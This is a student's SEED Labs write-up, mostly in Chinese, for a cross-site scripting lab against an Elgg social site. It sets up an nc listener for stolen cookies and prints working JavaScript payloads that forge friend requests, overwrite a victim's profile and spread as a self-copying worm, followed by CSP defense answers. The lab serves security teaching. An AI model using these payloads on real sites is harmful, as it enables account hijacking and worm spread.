SEED Labs 2.0: Cross-Site Scripting (XSS) Attack Lab

Cross-Site Scripting (XSS) Attack Lab

Task 1: Posting a Malicious Message to Display an Alert Window

登录alice的账号,修改主页的信息,嵌入script脚本,保存主页信息

image-20231030164333496

image-20231030164352908

由于About me中标签有

所以不能嵌入到about me中,可以嵌入到brief description中

image-20231030164503440

保存之后可以看到脚本运行成功

image-20231030164521871

如果是长的script代码,就需要调用远端的javascript代码,放到我们自己的服务器上,通过使用src标签进行引用

Task 2: Posting a Malicious Message to Display Cookies

就是把Task1中的alert("hello")换为alert(document.cookie)

image-20231030164834301

image-20231030164842214

Task 3: Stealing Cookies from the Victim’s Machine

修改javascript脚本,发送cookie到我们监听的端口。使用nc -lknv 5555进行监听

image-20231030170149055

image-20231030170215364

保存之后,访问主页之后,发现请求报文被发送到远端的服务器了,但用户视角并没有提示

image-20231030170252282

image-20231030170318183

箭头所指部分就是cookie值

Task 4: Becoming the Victim’s Friend

可以看到在文本模式下输入一个字符,切换为HTML之后就会看到已经把他转义了

image-20231030183232002

image-20231030183240835

我们使用Samy添加alice并且抓包看看请求的url地址:http://www.seed-server.com/action/friends/add?friend=56&__elgg_ts=1698662057&__elgg_token=q3kjjkKfgKZHR7y00qMiXQ&__elgg_ts=1698662057&__elgg_token=q3kjjkKfgKZHR7y00qMiXQ

image-20231030183545143

所以恶意代码完整为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script type="text/javascript">
    window.onload = function () {
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
    var sendurl="/action/friends/add?friend=59" + ts + token + ts + token;
    if (elgg.session.user.guid != 47) {
	    Ajax=new XMLHttpRequest();
	    Ajax.open("GET",sendurl,true);
	    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	    Ajax.setRequestHeader("X-Requested-With","XMLHttpRequest");
	    Ajax.send();
	}
}
</script>

把代码插入

image-20231030184230222

使用alice访问samy的主页

image-20231030183952600

发现alice已经添加为好友了

image-20231030184331581

Q1: 这两行是为了绕过Elgg服务器的验证

Q2:不行,代码被转义成文本内容,不能当作脚本执行

Task 5: Modifying the Victim’s Profile

利用JS实现ajax代码,插入到主页中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<script type="text/javascript">
    window.onload = function(){
        var userName="&name="+elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        
        var content=token + ts + userName +
            "&description=samy%20is%20a%20handsome%20man&accesslevel[description]=2" +guid;
        var samyGuid=59;
        var sendurl="http://www.seed-server.com/action/profile/edit";
        
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST", sendurl, true);
            Ajax.setRequestHeader("Content-Type",
                                  "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

先看alice主页什么都没有,再次访问samy的主页

image-20231030210858493

发现主页已经被添加了一句话

image-20231030210924228

Question 3: Why do we need Line 14? Remove this line, and repeat your attack. Report and explain your observation.

这行代码是为了防止攻击者自身的主页被篡改导致攻击失败

Task 6: Writing a Self-Propagating XSS Worm

编辑profile,使得可以把自己赋值到别人的 profile 中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<script id="worm">
    var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
    var jsCode = document.getElementById("worm").innerHTML;
    var tailTag = "</" + "script>";
    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
    window.onload = function(){
        var userName="&name="+elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        
        var content=token + ts + userName +
            "&description=" + wormCode + "&accesslevel[description]=2" + 
     "&briefdescription=samy%20is%20a%20handsome%20man&accesslevel[briefdescription]=2" +guid;
        var samyGuid=59;
        var sendurl="http://www.seed-server.com/action/profile/edit";
        
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST", sendurl, true);
            Ajax.setRequestHeader("Content-Type",
                                  "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

alice访问samy主页后发现主页信息已经被修改

image-20231030213231400

使用Boby访问alice的主页,发现也被修改

image-20231030213310411

Task 7: Defeating XSS Attacks Using CSP

1.Describe and explain your observations when you visit these websites.

http://www.example60.com/

http://www.example70.com/

http://www.example32a.com/都显示的几个网站都是OK,表示都添加到白名单之中

http://www.example32b.com只有从example70和自己才被信任

http://www.example32c.com/只有从example70、自己和111-111-1111才被信任

2.Click the button in the web pages from all the three websites, describe and explain your observations.

只有http://www.example60.com/

http://www.example70.com/

http://www.example32a.com/执行成功

3.Change the server configuration on example32b (modify the Apache configuration), so Areas 5 and 6 display OK. Please include your modified configuration in the lab report.

image-20231030221913592

image-20231030221940791

4.Change the server configuration on example32c (modify the PHP code), so Areas 1, 2, 4, 5, and 6 all display OK. Please include your modified configuration in the lab report.

image-20231030222522915

image-20231030222530462

5.Please explain why CSP can help prevent Cross-Site Scripting attacks.

CSP添加了一个信任的站点的机制,只会执行信任站点的代码。